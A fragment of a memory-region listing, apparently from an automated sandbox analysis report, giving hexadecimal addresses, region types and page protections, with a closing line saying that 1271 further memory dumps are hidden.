page read and write
1B66CDD3000
heap
page read and write
1B66CC82000
heap
page read and write
281BDD70000
heap
page read and write
1B66CDE2000
heap
page read and write
4931000
heap
page read and write
226BE000
heap
page read and write
1B66CD67000
heap
page read and write
8AC0000
heap
page read and write
2200E000
stack
page read and write
1060000
unkown
page read and write
EFC000
stack
page read and write
1B66CF67000
heap
page read and write
7FF848FA0000
trusted library allocation
page read and write
1BE000
unkown
page readonly
3443000
trusted library allocation
page execute and read and write
2D6E000
stack
page read and write
4931000
heap
page read and write
1B66AD60000
heap
page read and write
BE0000
unkown
page readonly
1CB00517000
trusted library allocation
page read and write
79EA000
heap
page read and write
4931000
heap
page read and write
1B66CDC7000
heap
page read and write
3315000
heap
page read and write
21C70000
direct allocation
page read and write
4A5E000
heap
page read and write
2D2F000
unkown
page read and write
1271 further memdumps are hidden in this view and are not listed above; the memory-region list is therefore incomplete.